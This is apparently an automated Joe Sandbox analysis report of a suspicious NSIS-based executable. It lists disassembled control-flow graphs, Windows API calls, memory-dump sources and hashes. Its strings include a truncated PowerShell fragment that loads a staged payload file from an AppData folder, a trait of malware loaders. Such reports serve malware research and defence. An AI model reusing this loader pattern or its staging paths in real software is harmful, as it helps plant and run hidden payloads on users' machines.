                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ro7eoySJ9q.exe",00000000,?), ref: 004034D7
                                                                      • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                                      • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich,?), ref: 00403544
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\ro7eoySJ9q.exe,0042A9B8,00000001), ref: 00403558
                                                                      • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                                      • ExitProcess.KERNEL32 ref: 0040363A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                      • String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich$"C:\Users\user\Desktop\ro7eoySJ9q.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\Desktop$C:\Users\user\Desktop\ro7eoySJ9q.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                      • API String ID: 4107622049-3401160410
                                                                      • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                      • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                                      • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                                      • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 116 405139-405154 117 4052e5-4052ec 116->117 118 40515a-405223 GetDlgItem * 3 call 403fca call 404897 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 119 405316-405323 117->119 120 4052ee-405310 GetDlgItem CreateThread CloseHandle 117->120 136 405241-405244 118->136 137 405225-40523f SendMessageW * 2 118->137 123 405341-405348 119->123 124 405325-40532b 119->124 120->119 128 40534a-405350 123->128 129 40539f-4053a3 123->129 126 405363-40536c call 403ffc 124->126 127 40532d-40533c ShowWindow * 2 call 403fca 124->127 140 405371-405375 126->140 127->123 133 405352-40535e call 403f6e 128->133 134 405378-405388 ShowWindow 128->134 129->126 131 4053a5-4053a8 129->131 131->126 138 4053aa-4053bd SendMessageW 131->138 133->126 141 405398-40539a call 403f6e 134->141 142 40538a-405393 call 404ffa 134->142 144 405254-40526b call 403f95 136->144 145 405246-405252 SendMessageW 136->145 137->136 146 4054c1-4054c3 138->146 147 4053c3-4053e4 CreatePopupMenu call 405d68 AppendMenuW 138->147 141->129 142->141 155 4052a1-4052c2 GetDlgItem SendMessageW 144->155 156 40526d-405281 ShowWindow 144->156 145->144 146->140 153 4053e6-4053f7 GetWindowRect 147->153 154 4053f9-4053ff 147->154 157 405402-40541a TrackPopupMenu 153->157 154->157 155->146 160 4052c8-4052e0 SendMessageW * 2 155->160 158 405290 156->158 159 405283-40528e ShowWindow 156->159 157->146 161 405420-405437 157->161 162 405296-40529c call 403fca 158->162 159->162 160->146 163 40543c-405457 SendMessageW 161->163 162->155 163->163 165 405459-40547c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 40547e-4054a5 SendMessageW 165->166 166->166 167 4054a7-4054bb GlobalUnlock SetClipboardData CloseClipboard 166->167 167->146
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                                      • GetClientRect.USER32(?,?), ref: 004051E4
                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405288
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                                        • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                                      • ShowWindow.USER32(00000000), ref: 00405334
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405339
                                                                      • ShowWindow.USER32(00000008), ref: 00405380
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                                      • CreatePopupMenu.USER32 ref: 004053C3
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                                      • GetWindowRect.USER32(?,?), ref: 004053EB
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                                      • OpenClipboard.USER32(00000000), ref: 0040545A
                                                                      • EmptyClipboard.USER32 ref: 00405460
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                                      • CloseClipboard.USER32 ref: 004054BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: {
                                                                      • API String ID: 590372296-366298937
                                                                      • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                      • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                                      • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                                      • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 409 405d68-405d73 410 405d75-405d84 409->410 411 405d86-405d9c 409->411 410->411 412 405da2-405daf 411->412 413 405fb4-405fba 411->413 412->413 414 405db5-405dbc 412->414 415 405fc0-405fcb 413->415 416 405dc1-405dce 413->416 414->413 418 405fd6-405fd7 415->418 419 405fcd-405fd1 call 405d46 415->419 416->415 417 405dd4-405de0 416->417 421 405fa1 417->421 422 405de6-405e22 417->422 419->418 423 405fa3-405fad 421->423 424 405faf-405fb2 421->424 425 405f42-405f46 422->425 426 405e28-405e33 GetVersion 422->426 423->413 424->413 429 405f48-405f4c 425->429 430 405f7b-405f7f 425->430 427 405e35-405e39 426->427 428 405e4d 426->428 427->428 434 405e3b-405e3f 427->434 431 405e54-405e5b 428->431 435 405f5c-405f69 call 405d46 429->435 436 405f4e-405f5a call 405c8d 429->436 432 405f81-405f89 call 405d68 430->432 433 405f8e-405f9f lstrlenW 430->433 438 405e60-405e62 431->438 439 405e5d-405e5f 431->439 432->433 433->413 434->428 442 405e41-405e45 434->442 446 405f6e-405f77 435->446 436->446 444 405e64-405e81 call 405c13 438->444 445 405e9e-405ea1 438->445 439->438 442->428 447 405e47-405e4b 442->447 452 405e86-405e8a 444->452 450 405eb1-405eb4 445->450 451 405ea3-405eaf GetSystemDirectoryW 445->451 446->433 449 405f79 446->449 447->431 453 405f3a-405f40 call 405fda 449->453 455 405eb6-405ec4 GetWindowsDirectoryW 450->455 456 405f1f-405f21 450->456 454 405f23-405f27 451->454 457 405e90-405e99 call 405d68 452->457 458 405f29-405f2d 452->458 453->433 454->453 454->458 455->456 456->454 459 405ec6-405ed0 456->459 457->454 458->453 462 405f2f-405f35 lstrcatW 458->462 464 405ed2-405ed5 459->464 465 405eea-405f00 SHGetSpecialFolderLocation 459->465 462->453 464->465 466 405ed7-405ede 464->466 467 405f02-405f19 SHGetPathFromIDListW CoTaskMemFree 465->467 468 405f1b 465->468 470 405ee6-405ee8 466->470 467->454 467->468 468->456 470->454 470->465
                                                                      APIs
                                                                      • GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
                                                                      • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
                                                                      • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                                      • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
                                                                      • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                                      • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                                      • lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aich$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-276129843
                                                                      • Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                                      • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                                      • Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                                      • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 471 4055d5-4055fb call 4058b6 474 405614-40561b 471->474 475 4055fd-40560f DeleteFileW 471->475 477 40561d-40561f 474->477 478 40562e-40563e call 405d46 474->478 476 4057a7-4057ab 475->476 479 405755-40575a 477->479 480 405625-405628 477->480 486 405640-40564b lstrcatW 478->486 487 40564d-40564e call 4057fa 478->487 479->476 482 40575c-40575f 479->482 480->478 480->479 484 405761-405767 482->484 485 405769-405771 call 406089 482->485 484->476 485->476 494 405773-405787 call 4057ae call 40558d 485->494 489 405653-405657 486->489 487->489 492 405663-405669 lstrcatW 489->492 493 405659-405661 489->493 495 40566e-40568b lstrlenW FindFirstFileW 492->495 493->492 493->495 510 405789-40578c 494->510 511 40579f-4057a2 call 404ffa 494->511 496 405691-4056aa call 4057db 495->496 497 40574a-40574e 495->497 504 4056b5-4056b9 496->504 505 4056ac-4056b0 496->505 497->479 501 405750 497->501 501->479 508 4056d0-4056de call 405d46 504->508 509 4056bb-4056c2 504->509 505->504 507 4056b2 505->507 507->504 521 4056e0-4056e8 508->521 522 4056f5-405700 call 40558d 508->522 513 4056c4-4056c8 509->513 514 405729-40573b FindNextFileW 509->514 510->484 516 40578e-40579d call 404ffa call 405be0 510->516 511->476 513->508 517 4056ca-4056ce 513->517 514->496 519 405741-405744 FindClose 514->519 516->476 517->508 517->514 519->497 521->514 525 4056ea-4056f3 call 4055d5 521->525 530 405721-405724 call 404ffa 522->530 531 405702-405705 522->531 525->514 530->514 533 405707-405717 call 404ffa call 405be0 531->533 534 405719-40571f 531->534 533->514 534->514
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 004055FE
                                                                      • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405646
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 00405669
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040566F
                                                                      • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040567F
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                                      • FindClose.KERNEL32(00000000), ref: 00405744
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\ro7eoySJ9q.exe", xrefs: 004055DE
                                                                      • \*.*, xrefs: 00405640
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-3969872327
                                                                      • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                      • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                                      • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                                      • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                      • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                      • String ID:
                                                                      • API String ID: 310444273-0
                                                                      • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                      • Instruction ID: 8a2f4544d0f7460eb2636e635d5deeba11c8ac6a6071c480d08d1599e38ef1a2
                                                                      • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                      • Instruction Fuzzy Hash: C3E0CD326002309BC3204B30AE4497773EC9F98640305043EF645F6000CB74DC22EF69
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,004058FF,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76233420,004055F5,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 00406094
                                                                      • FindClose.KERNELBASE(00000000), ref: 004060A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                      • Instruction ID: 8c9aebf9a212da5294cb1f82767a4f5960c49382cb163a998aea3b369420c93e
                                                                      • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                      • Instruction Fuzzy Hash: B2D012716585209BC7905738AE0C84B7A98AF593717224B36F46BF22E0CB3C8C66869C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
